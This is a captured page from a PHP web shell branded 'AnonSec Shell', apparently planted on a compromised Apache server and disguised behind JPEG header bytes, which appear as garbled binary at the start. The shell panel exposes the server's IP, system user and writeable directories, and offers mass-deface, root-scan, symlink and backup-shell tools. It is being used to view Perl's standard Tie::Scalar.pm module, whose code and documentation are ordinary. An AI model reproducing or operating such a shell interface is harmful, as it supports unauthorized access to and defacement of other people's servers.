JFIF  H H C nxxd C "     &    !1A2Q"aqBb    1   ? R{~ ,.Y| @sl_޸s[+6ϵG};?2Y`&9LP ?3rj  "@V]:3T -G*P ( *(@AEY]qqqALn +Wtu?)l QU T* Aj- x:˸T u53Vh @PS@ ,i,!"\hPw+E@ ηnu ڶh% (Lvũbb- ?M֍݌٥IHln㏷L(6 9L^"6P  d&1H&8@TUT CJ%eʹFTj4i5=0g J &Wc+3kU@PS@HH33M * "Uc(\`F+b{RxWGk ^#Uj*v' V ,FYKɠMckZٸ]ePP  d\A2glo=WL(6 ^;k"ucoH"b ,PDVlvL_/:̗rN\m dcw T-O$w+FZ5T *Y~l: 99U)8ZAt@GLX*@bijqW;MᎹ،O[5*5*@=qusݝ *EPx՝.~ YИ 3M3@E)GTg%Anp P MUҀhԳW c֦iZ ffR 7qMcyAZT c0bZU k+oG<] APQ T A={PDti@c>>KÚ"q L.1P k6QY7t.k7o  <P &yַܼJZy Wz{UrS @ ~P)Y:A"]Y&ScVO%17 6l4 i4YR5 ruk* ؼdZͨZZ cLakb3N6æ\1`XTloTuT AA 7Uq@2ŬzoʼnБRͪ&8}: e}0ZNΖJ*Ս9˪ޘtao]7$ 9EjS} qt" ( .=Y:V#'H: δ4#6yjѥBB ;WD-ElFf67*\AmAD Q __'2$ TX 9nu'm@iPDT qS`%u%3[nY,  :g = tiX H]ij"+6Z* .~|05s6 ,ǡ ogm+ KtE-BF  ES@(UJ xM~8%g/= Vw[Vh 3lJT  rK -kˎY ٰ  ,ukͱٵf sXDP  ]p]&MS95O+j &f6m463@ t8ЕX=6}HR 5ٶ06 /@嚵*6  " hP@eVDiYQT `7tLf4c?m//B4 laj  L} :E  b#PHQb, yN`rkAb^ |} s4XB4 * ,@[{Ru+%le2} `,kI$U` >OMuh  P % ʵ/ L\5aɕVN1R6 3}ZLj-Dl@ *( K\^i@F@551 k㫖h  Q沬#h XV +;]6z OsFpiX $OQ ) ųl4 YtK'(W AnonSec Shell
AnonSec Shell
Server IP : 31.31.79.131  /  Your IP : 172.18.0.1   [ Reverse IP ]
Web Server : Apache/2.4.38 (Debian)
System : Linux a1822d00732a 4.15.0-39-generic #42-Ubuntu SMP Tue Oct 23 15:48:01 UTC 2018 x86_64
User : www-data ( 33)
PHP Version : 7.1.33
Disable Function : pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wifcontinued,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_get_handler,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority,pcntl_async_signals,
Domains : 0 Domains
MySQL : OFF  |  cURL : ON  |  WGET : OFF  |  Perl : ON  |  Python : OFF  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /usr/share/perl/5.28.1/Tie/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ HOME ]     [ BACKUP SHELL ]     [ JUMPING ]     [ MASS DEFACE ]     [ SCAN ROOT ]     [ SYMLINK ]     

Current File : /usr/share/perl/5.28.1/Tie/Scalar.pm
package Tie::Scalar;

our $VERSION = '1.04';

=head1 NAME

Tie::Scalar, Tie::StdScalar - base class definitions for tied scalars

=head1 SYNOPSIS

    package NewScalar;
    require Tie::Scalar;

    @ISA = qw(Tie::Scalar);

    sub FETCH { ... }		# Provide a needed method
    sub TIESCALAR { ... }	# Overrides inherited method


    package NewStdScalar;
    require Tie::Scalar;

    @ISA = qw(Tie::StdScalar);

    # All methods provided by default, so define
    # only what needs be overridden
    sub FETCH { ... }


    package main;

    tie $new_scalar, 'NewScalar';
    tie $new_std_scalar, 'NewStdScalar';

=head1 DESCRIPTION

This module provides some skeletal methods for scalar-tying classes. See
L<perltie> for a list of the functions required in tying a scalar to a
package. The basic B<Tie::Scalar> package provides a C<new> method, as well
as methods C<TIESCALAR>, C<FETCH> and C<STORE>. The B<Tie::StdScalar>
package provides all the methods specified in  L<perltie>. It inherits from
B<Tie::Scalar> and causes scalars tied to it to behave exactly like the
built-in scalars, allowing for selective overloading of methods. The C<new>
method is provided as a means of grandfathering, for classes that forget to
provide their own C<TIESCALAR> method.

For developers wishing to write their own tied-scalar classes, the methods
are summarized below. The L<perltie> section not only documents these, but
has sample code as well:

=over 4

=item TIESCALAR classname, LIST

The method invoked by the command C<tie $scalar, classname>. Associates a new
scalar instance with the specified class. C<LIST> would represent additional
arguments (along the lines of L<AnyDBM_File> and compatriots) needed to
complete the association.

=item FETCH this

Retrieve the value of the tied scalar referenced by I<this>.

=item STORE this, value

Store data I<value> in the tied scalar referenced by I<this>.

=item DESTROY this

Free the storage associated with the tied scalar referenced by I<this>.
This is rarely needed, as Perl manages its memory quite well. But the
option exists, should a class wish to perform specific actions upon the
destruction of an instance.

=back

=head2 Tie::Scalar vs Tie::StdScalar

C<< Tie::Scalar >> provides all the necessary methods, but one should realize
they do not do anything useful. Calling C<< Tie::Scalar::FETCH >> or 
C<< Tie::Scalar::STORE >> results in a (trappable) croak. And if you inherit
from C<< Tie::Scalar >>, you I<must> provide either a C<< new >> or a
C<< TIESCALAR >> method. 

If you are looking for a class that does everything for you you don't
define yourself, use the C<< Tie::StdScalar >> class, not the
C<< Tie::Scalar >> one.

=head1 MORE INFORMATION

The L<perltie> section uses a good example of tying scalars by associating
process IDs with priority.

=cut

use Carp;
use warnings::register;

sub new {
    my $pkg = shift;
    $pkg->TIESCALAR(@_);
}

# "Grandfather" the new, a la Tie::Hash

sub TIESCALAR {
    my $pkg = shift;
    my $pkg_new = $pkg -> can ('new');

    if ($pkg_new and $pkg ne __PACKAGE__) {
        my $my_new = __PACKAGE__ -> can ('new');
        if ($pkg_new == $my_new) {  
            #
            # Prevent recursion
            #
            croak "$pkg must define either a TIESCALAR() or a new() method";
        }

	warnings::warnif ("WARNING: calling ${pkg}->new since " .
                          "${pkg}->TIESCALAR is missing");
	$pkg -> new (@_);
    }
    else {
	croak "$pkg doesn't define a TIESCALAR method";
    }
}

sub FETCH {
    my $pkg = ref $_[0];
    croak "$pkg doesn't define a FETCH method";
}

sub STORE {
    my $pkg = ref $_[0];
    croak "$pkg doesn't define a STORE method";
}

#
# The Tie::StdScalar package provides scalars that behave exactly like
# Perl's built-in scalars. Good base to inherit from, if you're only going to
# tweak a small bit.
#
package Tie::StdScalar;
@ISA = qw(Tie::Scalar);

sub TIESCALAR {
    my $class = shift;
    my $instance = @_ ? shift : undef;
    return bless \$instance => $class;
}

sub FETCH {
    return ${$_[0]};
}

sub STORE {
    ${$_[0]} = $_[1];
}

sub DESTROY {
    undef ${$_[0]};
}

1;

Anon7 - 2022
AnonSec Team